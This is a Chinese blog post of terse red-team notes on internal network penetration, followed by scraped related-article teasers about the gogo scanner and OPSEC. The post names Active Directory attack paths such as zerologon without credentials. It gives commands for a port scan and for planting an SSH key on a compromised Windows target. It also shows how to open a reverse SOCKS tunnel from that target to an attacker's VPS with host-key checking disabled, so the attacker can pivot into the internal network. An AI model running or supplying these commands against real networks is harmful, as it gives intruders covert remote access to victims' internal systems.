OPSEC

最新推荐文章于 2025-11-13 12:20:41 发布
原创 最新推荐文章于 2025-11-13 12:20:41 发布 · 505 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全架构

OPSEC

1、gogo扫描

./gogo_darwin_amd64 -i ip -ev -p 1-20000 -t 100

在这里插入图片描述

内网渗透操作:
横向移动 维权 (计划任务)

权限提升?

在AD域内:浏览器密码很大程度上就是域密码

linux怎么找域
1.LDAP认证(389、636端口)
2.知道有域怎么打: a.有域凭据 impacket adexplorer 工具 b. 无凭据zerologon

ssh隧道反向SOCKS代理

通常会使用-R参数来开启远程转发,比如:

ssh -NR 1080:192.168.1.10:8000 root@39.39.39.39

把本机或者本机所在内网的某个端口转发到VPS的1080。

这里如果把 -R 参数之指定一个远程端口,就会让本机成为一个SOCKS代理服务器,比如:

ssh -NR 1080 root@39.39.39.39

这条命令默认会在VPS的127.0.0.1监听1080端口,通过1080即可访问目标192.168.1.10的内网。

设置监听到0.0.0.0

监听到127.0.0.1我们的攻击机不便于连接,有两种方法可以让他直接监听到0.0.0.0,

  1. 端口转发,使用SSH的-L,本地端口转发,或是其他端口转发工具,将1081端口的请求转发到1080
ssh -fCNL *:1081:localhost:1080 localhost
  1. 更改sshd_config文件的GatewayPorts配置。

GatewayPorts 配置选项用于控制 SSH 隧道(通常是端口转发)的行为,它决定了远程端口转发是否对除了本地主机之外的其他主机可见

  1. no:这是默认值。当设置为 no 时,远程端口转发只会监听本地接口(localhost 或 127.0.0.1),这意味着只有在服务器本机上才能访问转发的端口。
  2. yes:当设置为 yes 时,远程端口转发会监听所有接口,这意味着转发的端口可以被服务器上的任何接口上的任何主机访问,包括其他网络主机。这允许从服务器外部的主机连接到转发的端口。
  3. clientspecified:这是一个中间选项,它允许客户端在建立端口转发时指定监听地址。如果客户端指定了一个远程地址,那么端口转发将监听该指定的地址;如果客户端没有指定,那么就会回退到仅监听本地地址。

更改为yes或者clientspecified即可

其他准备

生成SSH密钥

ssh-keygen

cp id_rsa.pub authorized_keys

落地到目标机器的ssh私钥,因为windows权限问题可能会被服务端拒绝连接,需要修改权限

Icacls key.txt /Inheritance:r

Icacls key.txt /Grant:r "%Username%":"(R)"

最终,在目标机器执行下面命令即可

ssh -i id_rsa -p 22 -qngfNTR 6766 ubuntu@39.39.39.39 -o StrictHostKeyChecking=no

优化:将其写入配置文件直接执行:ssh -N -f -o StrictHostKeyChecking=no -F ~/ssconf D

OPSEC-Checklist:简单和不太简单的事情清单,以增强您的OPSEC
04-29
OPSEC清单 由带给您。 目标 提供任何人都可以遵循的简单步骤,以提高自己在数字世界中的安全。 在与安全有关的讨论中为讨论提供支持 避免提倡仿制建议,这对于大多数人来说应该是可以理解的 几步检查 帐目 使用...
精选资源
flume-opsec-source
06-06
Flume OPSEC 源码 Flume 源使用本机实用程序使用 LEA API 从 CheckPoint 获取日志。 Log Grabber 子进程由水槽源产生,它的 STDOUT 通过管道传输到内存队列。 当 process() 方法被调用时,内存队列会被 Flume 轮询...
【亲测免费】 探索高效网络扫描:gogo工具全面解析
gitblog_00220的博客
08-28 1558
在网络安全领域,快速而准确的网络扫描工具是防御的第一道防线。今天,我们将深入介绍一款名为**gogo**的开源项目,它以其卓越的性能和灵活的配置选项,在网络扫描工具中脱颖而出。 ## 项目介绍 **gogo**是一款用Go语言编写的网络扫描工具,它提供了从端口扫描到指纹识别的全方位功能。该工具特别强调性能优化,旨在以最小的资源消耗提供最快的扫描速度。gogo不仅支持主动和被动指纹识别,还能进行...
Gogo 项目常见问题解决方案
gitblog_00989的博客
01-27 496
Gogo 项目常见问题解决方案 1. 项目基础介绍 Gogo 是一个面向红队的高度可控可扩展的自动化引擎。它主要用于自动化安全测试,包括指纹识别、关键信息提取、无害扫描、启发式扫描等。Gogo 旨在以最快的速度、尽可能小的内存与CPU占用进行扫描,同时提供强大的性能。该项目主要使用 Go 编程语言编写。 2. 新手常见问题与解决步骤 问题一:如何进行基本的扫描操作? 问题描述: 新手用户在使用 G...
gogo网络扫描引擎深度技术解析
最新发布
gitblog_00712的博客
11-13 424
gogo是一款面向红队的高度可控可拓展自动化网络扫描引擎,采用Go语言开发,专注于高性能网络探测与指纹识别。该引擎通过创新的架构设计和智能扫描策略,实现了在最小资源消耗下的极致扫描性能。 ## 技术架构解析 gogo采用模块化架构设计,核心组件包括配置管理、扫描引擎、工作流处理和输出系统。配置系统通过Config结构体统一管理扫描参数,支持灵活的端口配置、探针设置和输出格式定制。Runner作
Gogo项目v2.13.8版本发布:动态指纹加载与端口配置优化
gitblog_01330的博客
06-08 415
Gogo项目v2.13.8版本发布:动态指纹加载与端口配置优化 Gogo是一款功能强大的网络安全扫描工具,专注于高效、灵活的网络探测和指纹识别。该项目采用Go语言开发,具有跨平台支持、高性能并发等特性,能够帮助安全研究人员和网络管理员快速发现网络资产并识别服务指纹。 本次发布的v2.13.8版本带来了两项重要功能改进和一项使用体验优化,进一步提升了工具的灵活性和易用性。 动态指纹加载功能 新版本引...
OPSEC与查水表
有价值炮灰
04-19 1925
偶然在网上的讨论群里看到某“黑客”在吹嘘自己如何通过代理/跳板搞事情。这样真的有效吗?本文也从技术层面去谈谈这个问题。
一款面向红队的高度可控可拓展的自动化引擎工具
Python_0011的博客
11-08 690
面向红队的, 高度可控可拓展的自动化引擎.gogo是一款几乎能解决一切内网自动化操作的工具, 并非是一个简单的缝合怪, 也不是仅仅实现了功能的demo, 而是一个经过两年打磨, 对几乎所有场景(webshell, cs, 多级代理等等)下都有大量优化的 红队向工具.gogo将内网自动化 从某些工具的一键无脑操作提升到有目的的行动策略组, 几乎可以在所有奇怪复杂场景下通过特定的参数组合解决. 甚至在高防护的内网中, 也能进行一定程度的规避与探测.
精选资源
opsec:OPSEC-运营安全
05-02
请参阅 这是该网站的Pelican,Sphinx和YAML源代码。 YAML是文本的权威源代码 Sphinx推动了在线文档和电子书的产生 鹈鹕驱动静态网站和博客的生成 sphinx_rtd_theme基础: ...建筑文档: ...建立和发布网站: ...
精选资源
online-opsec:威胁模型和工具,可让人们在上网时保持安全,私人和知情的状态,由普通人使用
03-31
在线运营安全OpSec) 威胁模型和工具,可让人们在上网时保持安全,私人和知情的状态,供一般人使用。 介绍 OPSEC或操作安全,在越南战争期间被美国军方最初引入,可以定义(指当)为,“......的过程,识别关键...
opsec-notes:各种来源的OPSEC相关说明
05-26
Opsec笔记 各种来源的OPSEC相关说明 如何进行秘密工作 如何掌握秘密工作.html 每个人,从上到下,都必须有好的封面故事来保护他们。 这是一个隐藏或伪装正在完成的真实工作的传说或故事。 例如:在公园里举行一次...
终极网络安全扫描引擎:如何用gogo实现红队自动化渗透测试?
gitblog_00076的博客
10-24 447
在网络安全攻防对抗中,一款**高度可控可拓展的自动化引擎**能让红队效率提升10倍!今天要介绍的**GitHub加速计划/gogo**正是这样一款工具——它专为红队打造,通过模块化设计和灵活配置,让复杂的网络扫描任务变得简单高效。无论是内网资产发现还是风险验证,gogo都能成为你的渗透测试利器???? ## ???? 为什么选择gogo?红队专家的3大理由 ### 1. 轻量高效的Go语言架构 gog...
网络安全入门教程(非常详细),从零基础入门到精通,看完这一篇就够了
Python_0011的博客
11-26 4101
没有网络安全就没有国家安全”。当前,网络安全已被提升到国家战略的高度,成为影响国家安全、社会稳定至关重要的因素之一。网络安全行业特点1、就业薪资非常高,涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万!2、人才缺口大,就业机会多2019年9月18日《中华人民共和国中央人民政府》官方网站发表:我国网络空间安全人才 需求140万人,而全国各大学校每年培养的人员不到1.5W人。
golin 扫描工具使用
zengliguang的专栏
11-23 943
golin port -i 192.168.3.1/24, 会进行漏洞扫描。扫描完成,结果报告文件在exe所在路径下。进入golin可执行程序路径,运行cmd。
CheckPoint公司
weixin_33805557的博客
03-08 311
1. Check Point软件技术有限公司    Check Point软件技术有限公司成立时间于 1993 年,美国总部在加利福尼亚州红木城,国际总部在以色列莱莫干市,员工人数: 1180 多人。 是全球首屈一指的 Internet 安全解决方案供应商,在全球企业防火墙、个人防火墙及虚拟专用网络( ××× )市场上居于领导地位。 Check Poin...
Microsoft详细介绍了OPSEC,SolarWinds黑客使用的取证技术
llawliet0001的专栏
02-05 571
导读 微软近日发布了一份报告,详细说明了对IT管理解决方案公司SolarWinds进行攻击的威胁参与者的活动和方法,包括其恶意软件传递方法,反取证行为和操作安全性(OPSEC)。 某些人认为是俄罗斯赞助的攻击者,在2019年破坏了SolarWinds的系统,并使用一种名为Sundrop的恶意软件在Sun公司的Orion产品中插入了被追踪为Sunburst的后门。Sunburst已交付给成千上万的组织,但是使攻击者产生兴趣的几百名受害者收到了其他几款恶意软件,其许多系统都使用了手动键盘技术而受到
11、内容安全OPSEC技术解析
a1b2c的博客
07-24 45
本文详细解析了Check Point FireWall-1的内容安全防护机制与OPSEC技术。通过集成第三方解决方案,Check Point利用应用层网关实现流量扫描与修改,并通过CVP和UFP协议实现病毒扫描与Web过滤。文章还介绍了OPSEC联盟、安全服务器类型、MDQ邮件排队器、SIC加密通信等关键技术,同时提供了配置指南、常见问题解答及流程图,帮助网络管理员构建安全稳定的网络环境。
国内常见网络与安全、主机系统的syslog配置方法(下)
weixin_34221773的博客
09-15 341
4.3.3  Cisco交换机 通过Cisco路由器的Syslog服务转发系统日志到采集服务器,具体配置方法如下: device#conf t device(config)#logging on device(config)#logging IP   //日志服务器的IP地址 device(config)#logging trap critical    //日志记录级别,可用"?"查看...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bulldozer++

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值